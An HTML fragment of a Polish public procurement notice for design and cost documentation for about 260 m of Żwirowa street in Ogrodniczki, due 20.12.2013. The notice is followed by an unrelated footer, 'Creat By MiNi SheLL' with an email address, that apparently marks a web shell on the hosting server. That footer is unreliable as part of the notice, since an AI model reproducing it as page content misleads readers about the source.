<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo - kosztorysowej: budowa ulicy Żwirowej w Ogrodniczkach - długość ok. 260 m do ostatnich zabudowań,- z uwzględnieniem odprowadzenia wód opadowych, ewentualną niezbędną przebudową istniejącej infrastruktury oraz ewentualnymi elementami wodociągu  i kanalizacji sanitarnej (odejścia od głównych sieci), dowiązaniem do istniejących ulic, z uwzględnieniem docelowej szerokości ulic..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com